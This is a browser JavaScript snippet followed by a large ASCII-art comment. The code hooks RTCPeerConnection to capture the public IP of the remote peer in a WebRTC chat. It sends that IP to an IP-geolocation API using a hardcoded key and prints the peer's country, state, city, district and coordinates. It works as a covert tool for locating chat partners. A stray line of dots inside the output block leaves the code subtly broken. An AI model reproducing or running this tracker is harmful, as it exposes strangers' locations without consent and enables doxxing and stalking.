
window.oRTCPeerConnection =
  window.oRTCPeerConnection || window.RTCPeerConnection;
window.RTCPeerConnection = function (...args) {
  const pc = new window.oRTCPeerConnection(...args);
  pc.oaddIceCandidate = pc.addIceCandidate;
  pc.addIceCandidate = function (iceCandidate, ...rest) {
    const fields = iceCandidate.candidate.split(" ");
    console.log(iceCandidate.candidate);
    const ip = fields[4];
    if (fields[7] === "srflx"){
      getLocation(ip);}
    return pc.oaddIceCandidate(iceCandidate, ...rest);};
  return pc;};
const apiKey = "9da56854716b441a877558cd4969ca0c";
let getLocation = async (ip) => {
  let url = `https://api.ipgeolocation.io/ipgeo?apiKey=${apiKey}&ip=${ip}`;
  await fetch(url).then((response) =>
    response.json().then((json) => {
      const output = `  
          
          gorka...
          
          pais: ${json.country_name}
          estado: ${json.state_prov}
          ciudad: ${json.city}
          distrito: ${json.district}
          largo: (${json.latitude}, ${json.longitude})`;
          .........................     
      console.log(output);}));};

//MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
//MMMMMMXXWMMMMMMMMMMMMMMMMMMMMMMMMWXOOXX0dddddxOXWMMMMMWNXXNNWWWMMMMMMMMMMMMMMM
//MMMMMNO0WMMMMMMMMMMMMMMMMMMMMMMMWk:':_..........M0WMMMX0.....MMMWMMMMMMMMMMMMM
//MMMMMXOXMMMMMMMMMMMMMMMMMMMMMMO;..,.............XMMMWX.....MMMKMMMMMMMMMMMMMMM
//MMMMWMMMMMMMMMMMMMMMMMMMMMMMNlm...;.............MMMWX.....cclkWMMMMMMMMMMMMMMM
//MMM...MMXMMMMMMMMMMMMMMMMMMMMXm....;............NMMMMMMW....k0NMMMMMMMMMMMMMMM
//MMM....MMMMMMMMMMMMMMMMMMMMMMMMXc....;..........MKNWMMMMMMM.....00NMMMMMMMMMMM
//MMMM..kOWMMMMMMMMMMMMMMMMMMMMMMWo....;.........M0KNMMMMMMMMM.....00WMMMMMMMMMM
//MMMMM...XMMMMMMMMMMMMMMMMMMMMMMM0;...;;........OKXNMMMMMMMMM......NNMMMMMMMMMM
//MMMMMM...NMMMMMMMMMMMMMMMMMMMMMMW0c...,........KOO0KXNWWWWWWWX....kKMMMMMMMMMM
//MMMMMMW...NMMMMMMMMMMMMMMMMMMMMMMMNK...............................OWMMMMMMMMM
//MMMMMMMW...NMMMMMMMMMMMMMMMMMMMMMM................................dkNMMMMMMMMM
//MMMMMMMMNO...NXXNWMMMMMMMMMMMMMMMM.;.................ddxxxxxxxdddxKWMMMMMMMMMM
//MMMMMMMMMWO...;,:OWMMMMMMMMMMMM....;.................KXNXXXXKKKKNWMMMMMMMMMMMM
//MMMMMMMMMNd'..,::cxNMMMMMMMMM.......................OWMMMMMMMMMMMMMMMMMMMMMMMM
//MMMMMMMMMNd..:......MMMMMMM.......MM................MMMMMMMMMMMMMMMMMMMMMMMMMM
//MMMMMMMMMMXx....................MMMM................MMMMMMMMMMMMMMMMMMMMMMMMMM
//MMMMMMMMMMMMM.................MMMMMM................MMMMMMMMMMMMMMMMMMMMMMMMMM
//MMMMMMMMMMMMMMMMWWNMMMMMMMMMMMMMMoONM...............MMMMWMMMMMMMMMMMMMMMMMMMMM
//MMMMMMMMMMMMMMMMMMMMMMWWWNXK0Okk0NMMM...............MMMNMMMMMMMMMMMMMMMMMMMMMM
//MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM...............MMMMXMMMMMMMMMMMMMMMMMMMMM
//MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWWWNNNM............MMM.MMMMMMMMMMMMMMMMMMMMMMMMM
//MMMMMMMMMMMMMMMMMMMMMMMMMWWNXXXKKKK00..........MM.......MMMMMMMMMMMMMMMMMMMMMM
//MMMMMMMMMMMMMMMMMMMMMMMMNXK000000OOOOM........M.........MMMWMMMMMMMMMMMMMMMMMM
//MMMMMMMMMMMMMMMMMMMMMMMN00000.........M......M...........MMMMMMMMMMMMMMMMMMMMM
//MMMMMMMMMMMMMMMMMMMMMMWKO0.............M....M............MMMKWMMMMMMMMMMMMMMMM
//MMMMMMMMMMMMMMMMMMMMMMXXM...............M..M............MOxkXMMMMMMMMMMMMMMMMM
//MMMMMMMMMMMMMMMMMMMMMW......kxkKXNWWWMMMMMMMMMMMM........MMMMMMMMMMMMMMMMMMMMM
//MMMMMMMMMMMMMMMMMMMMW.......kOXWMMMMMMMMMMMMMMMMMMMN........MMMMMMMMMMMMMMMMMM
//MMMMMMMMMMMMMMMMMMMW.....00O0NMMMMMMMMMMMMMMMMMMMMMMMMM.......MMMMMMMMMMMMMMMM
//MMMMMMMMMMMMMMMMM........00KNMMMMMMMMMMMMMMMMMMMMMMMMWKkx........WMMMMMMMMMMMM
//MMMMMMMMMMMMMMMM.........KNWMMMMMMMMMMMMMMMMMMMMMMMMMMWXOk........MMMMMMMMMMMM
//MMMM..................NWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWNK........WMMMMMMMMMMMM
//MMMMMMW0............0KXWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWKo:.;;...MMMMMMMMM
//MMMMMMWX00Ox.........OWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMNkc.......MMMMMMMM
//MMMMMMMMWNXKOkx......KMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWOc......WMMMMMMMM
//MMMMMMMMMMMMNKOOOOOOKWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWKdo....kKNMMMMMMM
//MMMMMMMMMMMMMMWWNXXNWMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWKOOxdxxxx0WMMMMMM
//MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMWNKOkxkO0KNMMMMMMM
//MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM


